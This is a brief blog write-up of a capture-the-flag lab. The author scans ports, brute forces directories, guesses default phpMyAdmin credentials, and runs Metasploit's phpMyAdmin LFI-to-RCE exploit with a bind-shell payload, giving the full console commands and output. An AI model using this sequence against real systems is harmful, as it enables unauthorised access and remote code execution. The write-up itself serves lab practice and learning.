trustie_rity
2 min readJan 14, 2022

METASPLOIT bind shell

i did a recent ctf challenge hosted at cyberranges . i solved it using metasploit framework , a very handy tool for script kiddies like me haha. For enumeration :

ping ip_address ;check if the server is up and running
msfconsole ;to start metasploit framework

PORT SCANNING

msf5 > search portscan
msf5 > use auxiliary/scanner/portscan/tcp
msf5 > set RHOST ip_address
msf5 > set RPORTS 1 - 100 ; to scan for the first 100 ports
msf5 > run

Anything after semicolon is a comment . port 22 and 80 were open .So i proceeded to brute force the website’s directories since port 22 wouldn’t help me much considering the fact that i didn’t have the credentials to login .

DIRECTORY BRUTE FORCING

msf5 > use auxiliary/scanner/http/dir_scanner ;you may need to set     msf5 >                                        ;the RHOST and RPORT 
msf5 > run

i found a phpmyadmin path which was interesting to me ,so i directly thought of a way to brute force the login credentials .

msf5 auxiliary(scanner/http/dir_scanner) > search phpmyadmin
msf5 > use auxiliary/scanner/http/phpmyadmin_login
msf5 auxiliary(scanner/http/phpmyadmin_login) > options

As shown using the options keyword on the current module, we need to set the correct TARGETURI for the phpMyAdmin instance, in this case /phpmyadmin/index.php . Secondly, i guessed that the username and password are both phpmyadmin.

msf5 auxiliary(scanner/http/phpmyadmin_login) > run

[*] PhpMyAdmin Version: 4.8.0
[+] 192.168.125.10:80 - Success: 'phpmyadmin:phpmyadmin'

Looks like it worked and we can login using the above combination! What’s more, we were able to retrieve the version of the phpMyAdmin instance running,this is helpful when deciding which exploit to use. Let’s try and see if there any public exploits we can use to gain operating system access on our target.

msf5 > search type:exploit phpmyadmin

msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > info ;to verify it msf5 > ;will work for my php version

CyberRange Tip
CyberRange does not currently support reverse shells so we need to choose a bind shell as our payload

while in their box i figured you could use the reverse shell but since i am using my box i’ll resort to using the bind shell.

msf5 exploit(multi/http/phpmyadmin_lfi_rce) > show payloads
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > set payload payload/generic/shell_bind_tcp
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > set USERNAME phpmyadmin
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > set PASSWORD phpmyadmin
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit
hope you enjoyed.
trustie_rity
trustie_rity

Written by trustie_rity

Offensive Penetration Tester | M4lici0s Lif3 | Find video walkthroughs on my yt channel: https://www.youtube.com/@trustie_rity https://johnkiguru1337.github.io/

No responses yet